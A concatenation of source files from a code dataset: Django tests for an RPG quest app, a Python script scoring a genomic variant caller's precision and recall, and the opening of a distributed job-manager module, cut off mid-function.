self.assertEquals(response.status_code, 404)\n\n 
@patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_object_list_is_only_available_characters(self, patched_available_characters):\n \"\"\"\n The object list should only contain characters that are available.\n \"\"\"\n available_characters = Character.objects.filter(pk=1)\n patched_available_characters.return_value = available_characters\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertEquals(response.context['object_list'], available_characters)\n self.assertTrue(self.character_2 not in response.context['object_list'])\n\n @patch('characters.models.CharacterProfile.has_available_characters', new_callable=PropertyMock)\n def test_if_not_characters_available_show_another_template(self, patched_has_available_characters):\n \"\"\"\n If the user has no available characters then a different template should be used.\n \"\"\"\n patched_has_available_characters.return_value = False\n response = self.client.get(reverse('quests:select_character', kwargs={'location_slug': self.location_1.slug}))\n self.assertTemplateUsed(response, 'characters/no_characters_available.html')\n\n\nclass CreateQuestTestCase(CreateUserMixin):\n \"\"\"\n Tests that a quest can be created once a user has selected the location and the character to start.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def setUp(self):\n super(CreateQuestTestCase, self).setUp()\n self.location_1 = Location.objects.get(pk=1)\n self.character_1 = CharacterUtils.create_character(self.user)\n self.character_2 = CharacterUtils.create_character(self.user)\n\n def test_create_view_renders(self):\n \"\"\"\n The view to create a quest should render.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n )\n )\n self.assertEquals(response.status_code, 200)\n self.assertTrue(issubclass(response.context['view'].__class__, CreateView))\n self.assertTrue(issubclass(response.context['view'].__class__, NoAvailableCharactersMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LocationFromRequestMixin))\n self.assertTrue(issubclass(response.context['view'].__class__, LoginRequiredMixin))\n self.assertTemplateUsed(response, 'quests/quest_form.html')\n self.assertEquals(response.context['location'], self.location_1)\n self.assertEquals(response.context['character'], self.character_1)\n self.assertEquals(len(response.context['form'].fields), 3)\n\n self.assertIsInstance(response.context['form'].fields['title'], forms.CharField)\n self.assertTrue(response.context['form'].fields['title'].required)\n\n self.assertIsInstance(response.context['form'].fields['description'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['description'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['description'].required)\n\n self.assertIsInstance(response.context['form'].fields['first_post'], forms.CharField)\n self.assertIsInstance(response.context['form'].fields['first_post'].widget, forms.Textarea)\n self.assertTrue(response.context['form'].fields['first_post'].required)\n\n def test_invalid_character_gives_404(self):\n \"\"\"\n If an invalid PK is provided for a character a 404 error is returned.\n \"\"\"\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': 999},\n )\n )\n 
self.assertEquals(response.status_code, 404)\n\n @patch('characters.models.CharacterProfile.available_characters', new_callable=PropertyMock)\n def test_unavailable_character_gives_404(self, patched_available_characters):\n \"\"\"\n If another user's character is provided then a 404 should be raised.\n \"\"\"\n patched_available_characters.return_value = Character.objects.filter(pk=self.character_1.pk)\n response = self.client.get(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_2.pk},\n )\n )\n self.assertEquals(response.status_code, 404)\n\n def test_quests_have_initialise_method(self):\n \"\"\"\n Quests should have an initialise method that sets the character, location\n and the GM.\n \"\"\"\n quest = Quest(title=u'Title', description=u'description')\n quest.initialise(\n gm=self.user.quest_profile,\n first_post=u'first post',\n location=self.location_1,\n character=self.character_1,\n )\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n\n def test_creating_a_quest_sets_first_post_characters_and_location(self):\n \"\"\"\n When a quest is created the logged in user should be set as the GM.\n \"\"\"\n valid_data = {\n 'title': u'Title 1',\n 'description': u'Description 1',\n 'first_post': u'first post',\n }\n response = self.client.post(\n reverse(\n 'quests:create_quest',\n kwargs={'location_slug': self.location_1.slug, 'character_pk': self.character_1.pk},\n ),\n data=valid_data,\n follow=True,\n )\n quest = Quest.objects.get(pk=1)\n self.assertRedirects(response, quest.get_absolute_url())\n self.assertEquals(quest.gm, self.user.quest_profile)\n self.assertTrue(self.character_1 in quest.current_characters)\n self.assertEqual(self.location_1, quest.current_location)\n post = Post.objects.get(pk=1)\n self.assertEquals(quest, post.quest)\n self.assertEquals(self.character_1, post.character)\n self.assertEquals(self.location_1, post.location)\n self.assertEquals(u'first post', post.content)\n message = list(response.context['messages'])[0]\n self.assertEqual('{0} has begun!'.format(u'Title 1'), unicode(message.message))\n self.assertTrue('success' in message.tags)\n\n\nclass QuestDetailViewTestCase(CreateUserMixin):\n \"\"\"\n Tests that there is a detail view for quests.\n \"\"\"\n fixtures = ['world-test-data.json']\n\n def test_detail_view_renders(self):\n \"\"\"\n It should be possible to view a quest.\n \"\"\"\n quest = Quest.objects.create(\n title=u'title', description=u'description', slug=u'slug', gm=self.user.quest_profile\n )\n response = self.client.get(reverse('quests:quest_detail', kwargs={'slug': quest.slug},))\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.context['object'], quest)\n", "sub_path": "quests/tests/test_create_quests.py", "file_name": "test_create_quests.py", "file_ext": "py", "file_size_in_byte": 11072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 21, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 29, "usage_type": "call"}, {"api_name": 
"characters.tests.utils.CharacterUtils", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 35, "usage_type": "call"}, {"api_name": "world.views.ContinentListView", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 50, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 60, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 68, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 68, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 69, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 69, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 70, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 70, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "characters.views.CharacterListView", "line_number": 78, "usage_type": "argument"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 86, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 94, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 94, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 96, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 89, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 89, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 106, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 100, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 100, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 110, "usage_type": "name"}, {"api_name": "world.models.Location.objects.get", "line_number": 118, "usage_type": "call"}, {"api_name": "world.models.Location.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "world.models.Location", "line_number": 118, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 119, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 119, "usage_type": "name"}, {"api_name": "characters.tests.utils.CharacterUtils.create_character", "line_number": 120, "usage_type": "call"}, {"api_name": "characters.tests.utils.CharacterUtils", "line_number": 120, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 127, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 133, "usage_type": "argument"}, {"api_name": "characters.mixins.NoAvailableCharactersMixin", "line_number": 
134, "usage_type": "argument"}, {"api_name": "world.mixins.LocationFromRequestMixin", "line_number": 135, "usage_type": "argument"}, {"api_name": "braces.views.LoginRequiredMixin", "line_number": 136, "usage_type": "argument"}, {"api_name": "django.forms.CharField", "line_number": 142, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 142, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 145, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 145, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 146, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 149, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 149, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 150, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 158, "usage_type": "call"}, {"api_name": "characters.models.Character.objects.filter", "line_number": 170, "usage_type": "call"}, {"api_name": "characters.models.Character.objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "characters.models.Character", "line_number": 170, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 172, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 165, "usage_type": "call"}, {"api_name": "mock.PropertyMock", "line_number": 165, "usage_type": "name"}, {"api_name": "quests.models.Quest", "line_number": 184, "usage_type": "call"}, {"api_name": "quests.models.Post.objects.get", "line_number": 194, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 194, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 209, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects.get", "line_number": 216, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 216, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 216, "usage_type": "name"}, {"api_name": "quests.models.Post.objects.get", "line_number": 221, "usage_type": "call"}, {"api_name": "quests.models.Post.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "quests.models.Post", "line_number": 221, "usage_type": "name"}, {"api_name": "rpg_auth.tests.utils.CreateUserMixin", "line_number": 231, "usage_type": "name"}, {"api_name": "quests.models.Quest.objects.create", "line_number": 241, "usage_type": "call"}, {"api_name": "quests.models.Quest.objects", "line_number": 241, "usage_type": "attribute"}, {"api_name": "quests.models.Quest", "line_number": 241, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 244, "usage_type": "call"}]} +{"seq_id": "468508638", "text": "import os\nimport sys\nimport json\nfrom datetime import datetime\n\nconfig_file = open(sys.argv[1])\ndata = json.load(config_file)\nconfig_file.close()\n\nprog_version = data[\"ProgVer\"]\nprog_path = data[\"ProgPath\"]\ndata_dir = data[\"DataPath\"][\"DataDir\"]\nref_dir = data[\"DataPath\"][\"RefDir\"]\ngenome_fn = data[\"DataPath\"][\"GenomeFile\"]\nsnp_fn = data[\"DataPath\"][\"SNPProfFile\"]\nread_dir = data[\"DataPath\"][\"ReadDir\"]\nindex_dir = 
data[\"DataPath\"][\"IndexDir\"]\nresult_dir = data[\"DataPath\"][\"ResultDir\"]\nread_fn = data[\"DataPath\"][\"ReadPrefixFile\"]\n\nconfi = float(sys.argv[2])\ncpu_num = sys.argv[3]\ncov_num = sys.argv[4]\nresult_dn = sys.argv[5]\n\nref_path = os.path.join(data_dir, ref_dir)\nread_path = os.path.join(data_dir, read_dir)\n\ngenome_file = os.path.join(ref_path, genome_fn)\nsnp_file = os.path.join(ref_path, snp_fn)\n\nref_len = 249250621\nref_para = ['0.70', '0.75', '0.80', '0.85', '0.90', '0.95', '0.96', '0.97', '0.98', '0.99']\nread_lens = [100]\nseq_errs = ['0.00015-0.0015']\nmax_snum = [2**i for i in range(3, 14)]\nread_nums = []\nif cov_num == \"all\":\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25]]\nelse:\n read_nums = [cov*ref_len/(2*read_lens[0]) for cov in [int(cov_num)]]\n\nfor para in ref_para[0:1]:\n\n true_snp_comp, true_indel_comp, true_snp_none, true_indel_none = {}, {}, {}, {}\n variant_comp_file = os.path.join(ref_path, \"variant_comp_\" + para + \".txt\")\n variant_none_file = os.path.join(ref_path, \"variant_none_\" + para + \".txt\")\n\n with open(variant_comp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_comp[int(value[0])] = value[1]\n else:\n true_indel_comp[int(value[0])] = value[1]\n\n with open(variant_none_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[1]) == 1 and value[1] != \".\":\n true_snp_none[int(value[0])] = value[1]\n else:\n true_indel_none[int(value[0])] = value[1]\n\n KAKS, NS = len(true_snp_comp), len(true_snp_none)\n KAKID, NID = len(true_indel_comp), len(true_indel_none)\n\n result_path = os.path.join(data_dir, result_dir, \"isc_\" + para, result_dn)\n result_file_path = result_path + \"/\" + read_fn + \"_\" + str(read_lens[0]) + \".\" + str(seq_errs[0]) + \".prec-rec-time-mem.\" + str(confi) + \".all-pos.txt\"\n result_file = open(result_file_path, \"w\")\n\n header = [\"Alg\", \"cov\", \"qual\", \\\n \"S\", \"P-S\", \"R-S\", \"FP\", \"TP\", \"FP-S@Other\", \"P-S@None\", \"R-S@None\", \"P-S@Comp\", \"R-S@Comp\", \\\n \"I\", \"P-I\", \"R-I\", \"FP-I@Other\", \"P-I@None\", \"R-I@None\", \"P-I@Comp\", \"R-I@Comp\", \\\n \"S@None\", \"TP-S@None\", \"FP-S@None\", \"S@Comp\", \"TP-S@Comp\", \"FP-S@Comp\", \\\n \"I@None\", \"TP-I@None\", \"FP-I@None\", \"I@Comp\", \"TP-I@Comp\", \"FP-I@Comp\", \\\n \"run\", \"read\", \"proc\", \"max_snum\", \"max_ps_num\", \"na_num\", \"na_ratio\", \\\n \"timeI\", \"memI\", \"timeC\", \"memC\", \"input_para\", \"para\"]\n\n result_file.write(\"\\t\".join(header))\n result_file.write(\"\\n\")\n\n for rl in read_lens:\n for err in seq_errs:\n for rn in read_nums:\n for ms in max_snum[6:7]:\n prefix_fn = read_fn + \"_\" + str(rl) + \".\" + str(err) + \".\" + str(rn) + \".\" + str(ms)\n called_snp_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".vcf\")\n snp = {}\n with open(called_snp_file) as f:\n for line in f.readlines():\n if line.strip():\n value = line.strip().split()\n if len(value[2]) >= 1 and float(value[2]) >= confi:\n snp[int(value[0]) - 1] = value[1]\n\n result_file.write(\"\\t\".join([prog_version, \"%.0f\" % (2.0*int(rn)*int(rl)/ref_len), str(confi)]) + \"\\t\")\n\n TP_KAKS, TP_NS = 0, 0\n FP_KAKS, FP_NS = 0, 0\n TP_KAKID, TP_NID = 0, 0\n FP_KAKID, FP_NID = 0, 0\n FP_S, FP_ID = 0, 0\n for key, value in snp.iteritems():\n if key in true_snp_comp or key in 
true_indel_comp:\n if key in true_snp_comp:\n if value == true_snp_comp[key]:\n TP_KAKS += 1\n else:\n FP_KAKS += 1\n elif key in true_indel_comp:\n if value == true_indel_comp[key]:\n TP_KAKID += 1\n else:\n FP_KAKID += 1\n elif key in true_snp_none or key in true_indel_none:\n if key in true_snp_none:\n if value == true_snp_none[key]:\n TP_NS += 1\n else:\n FP_NS += 1\n elif key in true_indel_none:\n if value == true_indel_none[key]:\n TP_NID += 1\n else:\n FP_NID += 1\n else:\n if len(value) == 1:\n FP_S += 1\n else:\n FP_ID += 1\n\n result_file.write(str(KAKS + NS) + \"\\t\")\n if TP_KAKS + FP_KAKS + TP_NS + FP_NS + FP_S != 0 and KAKS + NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(TP_KAKS + TP_NS + FP_KAKS + FP_NS + FP_S)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS + TP_NS)/float(KAKS + NS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(\"%.5d\\t\" % (FP_KAKS + FP_NS + FP_S))\n result_file.write(\"%.5d\\t\" % (TP_KAKS + TP_NS))\n\n result_file.write(str(FP_S) + \"\\t\")\n if TP_NS + FP_NS != 0 and NS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(TP_NS + FP_NS)))\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(NS)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKS + FP_KAKS != 0 and KAKS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(TP_KAKS + FP_KAKS)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(KAKS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(KAKID + NID) + \"\\t\")\n if TP_KAKID + FP_KAKID + TP_NID + FP_NID + FP_ID != 0 and KAKID + NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(TP_KAKID + TP_NID + FP_KAKID + FP_NID + FP_ID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(KAKID + NID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(FP_ID) + \"\\t\")\n if TP_NID + FP_NID != 0 and NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(TP_NID + FP_NID)))\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(NID)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKID + FP_KAKID != 0 and KAKID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(TP_KAKID + FP_KAKID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(KAKID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(NS) + \"\\t\" + str(TP_NS) + \"\\t\" + str(FP_NS) + \"\\t\")\n result_file.write(str(KAKS) + \"\\t\" + str(TP_KAKS) + \"\\t\" + str(FP_KAKS) + \"\\t\")\n\n result_file.write(str(NID) + \"\\t\" + str(TP_NID) + \"\\t\" + str(FP_NID) + \"\\t\")\n result_file.write(str(KAKID) + \"\\t\" + str(TP_KAKID) + \"\\t\" + str(FP_KAKID) + \"\\t\")\n\n result_file.write(result_dn + \"\\t\" + prefix_fn + \"\\t\" + cpu_num + \"\\t\" + str(ms) + \"\\t1\\t\")\n\n mem_time_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".log\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"# of no-aligned reads\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(str((1-float(tokens[1]))/rn) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"time for initializing SNP caller\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after initializing SNP caller\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n if \"time for calling SNPs\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after 
calling SNPs\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"Input parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"Parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(\"\\n\")\n\nresult_file.close()\n", "sub_path": "ivc-tools/old-test-scripts/0.5-test-scripts/isc-test-dwgsim-eval-all-pos.py", "file_name": "isc-test-dwgsim-eval-all-pos.py", "file_ext": "py", "file_size_in_byte": 10449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}]} +{"seq_id": "540922159", "text": "#!/usr/bin/env python\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2015 Caian Benedicto \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom libspitz import JobBinary, SimpleEndpoint\nfrom libspitz import messaging, config\nfrom libspitz import memstat\nfrom libspitz import make_uid\nfrom libspitz import log_lines\n\nfrom libspitz import PerfModule\n\nimport Args\nimport sys, threading, os, time, logging, struct, traceback\n\n# Global configuration parameters\njm_killtms = None # Kill task managers after execution\njm_log_file = None # Output file for logging\njm_verbosity = None # Verbosity level for logging\njm_heart_timeout = None # Timeout for heartbeat response\njm_conn_timeout = None # Socket connect timeout\njm_recv_timeout = None # Socket receive timeout\njm_send_timeout = None # Socket send timeout\njm_send_backoff = None # Job Manager delay between sending tasks\njm_recv_backoff = None # Job Manager delay between reading results\njm_memstat = None # 1 to display memory statistics\njm_profiling = None # 1 to enable profiling\njm_perf_rinterv = None # Profiling report interval (seconds)\njm_perf_subsamp = None # Number of samples collected between report intervals\njm_heartbeat_interval = None # Delay between heartbeat rounds (seconds)\njm_jobid = None # Current job identifier\n\n###############################################################################\n# Parse global configuration\n###############################################################################\ndef parse_global_config(argdict):\n    global jm_killtms, jm_log_file, jm_verbosity, jm_heart_timeout, \\\n        jm_conn_timeout, jm_recv_timeout, jm_send_timeout, jm_send_backoff, \\\n        jm_recv_backoff, jm_memstat, jm_profiling, jm_perf_rinterv, \\\n        jm_perf_subsamp, jm_heartbeat_interval, jm_jobid\n\n    def as_int(v):\n        if v == None:\n            return None\n        return int(v)\n\n    def as_float(v):\n        if v == None:\n            return None\n        # These values are timeouts/intervals, so convert to float\n        # (the original int() here silently truncated fractional values).\n        return float(v)\n\n    def as_bool(v):\n        if v == None:\n            return None\n        return bool(v)\n\n    jm_killtms = as_bool(argdict.get('killtms', True))\n    jm_log_file = argdict.get('log', None)\n    jm_verbosity = as_int(argdict.get('verbose', logging.INFO // 10)) * 10\n    jm_heart_timeout = as_float(argdict.get('htimeout', config.heart_timeout))\n    jm_conn_timeout = as_float(argdict.get('ctimeout', config.conn_timeout))\n    jm_recv_timeout = as_float(argdict.get('rtimeout', config.recv_timeout))\n    jm_send_timeout = as_float(argdict.get('stimeout', config.send_timeout))\n    jm_recv_backoff = as_float(argdict.get('rbackoff', config.recv_backoff))\n    jm_send_backoff = as_float(argdict.get('sbackoff', config.send_backoff))\n    jm_memstat = as_int(argdict.get('memstat', 0))\n    jm_profiling = as_int(argdict.get('profiling', 0))\n    jm_perf_rinterv = as_int(argdict.get('rinterv', 60))\n    jm_perf_subsamp = as_int(argdict.get('subsamp', 12))\n    jm_heartbeat_interval = as_float(argdict.get('heartbeat-interval', 10))\n    jm_jobid = argdict.get('jobid', '')\n\n###############################################################################\n# Configure the log output format\n###############################################################################\ndef setup_log():\n    root = logging.getLogger()\n    root.setLevel(jm_verbosity)\n    root.handlers = []\n    if jm_log_file == None:\n        ch = logging.StreamHandler(sys.stderr)\n    else:\n        ch = logging.StreamHandler(open(jm_log_file, 'wt'))\n    ch.setLevel(logging.DEBUG)\n    formatter = logging.Formatter('%(asctime)s - %(threadName)s - '+\n        '%(levelname)s - 
%(message)s')\n    ch.setFormatter(formatter)\n    root.addHandler(ch)\n\n###############################################################################\n# Abort the application with a message\n###############################################################################\ndef abort(error):\n    logging.critical(error)\n    exit(1)\n\n###############################################################################\n# Parse the definition of a proxy\n###############################################################################\ndef parse_proxy(cmd):\n    cmd = cmd.split()\n\n    if len(cmd) != 3:\n        raise Exception()\n\n    logging.debug('Proxy %s.' % (cmd[1]))\n\n    name = cmd[1]\n    gate = cmd[2].split(':')\n    prot = gate[0]\n    addr = gate[1]\n    port = int(gate[2])\n\n    return (name, { 'protocol' : prot, 'address' : addr, 'port' : port })\n\n###############################################################################\n# Parse the definition of a compute node\n###############################################################################\ndef parse_node(cmd, proxies):\n    cmd = cmd.split()\n\n    if len(cmd) < 2:\n        raise Exception()\n\n    logging.debug('Node %s.' % (cmd[1]))\n\n    name = cmd[1]\n    host = name.split(':')\n    addr = host[0]\n    port = int(host[1])\n\n    # Simple endpoint\n    if len(cmd) == 2:\n        return (name, SimpleEndpoint(addr, port))\n\n    # Endpoint behind a proxy\n    elif len(cmd) == 4:\n        if cmd[2] != 'through':\n            raise Exception()\n\n        proxy = proxies.get(cmd[3], None)\n        if proxy == None:\n            raise Exception()\n\n        # Proxies are not supported yet...\n        logging.info('Node %s is behind a proxy and will be ignored.' %\n            (cmd[1]))\n        return None\n\n    # Unknown command format\n    raise Exception()\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list_from_file(filename = None):\n    # Override the filename if it is empty\n    if filename == None:\n        nodefile = 'nodes.txt'\n        filename = os.path.join('.', nodefile)\n\n    logging.debug('Loading task manager list from %s...' % (filename,))\n\n    # Read all lines\n    try:\n        with open(filename, 'rt') as file:\n            lines = file.readlines()\n    except:\n        logging.warning('Error loading the list of task managers from file!')\n        return {}\n\n    lproxies = [parse_proxy(x.strip()) for x in lines if x[0:5] == 'proxy']\n    proxies = {}\n\n    for p in lproxies:\n        if p != None:\n            proxies[p[0]] = p[1]\n\n    ltms = [parse_node(x.strip(), proxies) for x in lines if x[0:4] == 'node']\n    tms = {}\n    for t in ltms:\n        if t != None:\n            tms[t[0]] = t[1]\n\n    return tms\n\n###############################################################################\n# Load the list of task managers from a directory of node files\n###############################################################################\ndef load_tm_list_from_dir(dirname = None):\n    # Override the dirname if it is empty\n    if dirname == None:\n        dirname = 'nodes'\n\n    logging.debug('Loading task manager list from %s...' 
% (dirname,))\n\n    tms = {}\n\n    # Read all files\n    try:\n        for f in os.listdir(dirname):\n            f = os.path.join(dirname, f)\n            if not os.path.isfile(f):\n                continue\n            tms.update(load_tm_list_from_file(f))\n    except:\n        logging.warning('Error loading the list of task ' +\n            'managers from directory!')\n        return {}\n\n    return tms\n\n###############################################################################\n# Load the combined list of task managers from the file and the directory\n###############################################################################\ndef load_tm_list():\n    tms = load_tm_list_from_file()\n    tms.update(load_tm_list_from_dir())\n    logging.debug('Loaded %d task managers.' % (len(tms),))\n    return tms\n\n###############################################################################\n# Exchange messages with an endpoint to begin pushing tasks\n###############################################################################\ndef setup_endpoint_for_pushing(e):\n    try:\n        # Try to connect to a task manager\n        e.Open(jm_conn_timeout)\n    except:\n        # Problem connecting to the task manager\n        # 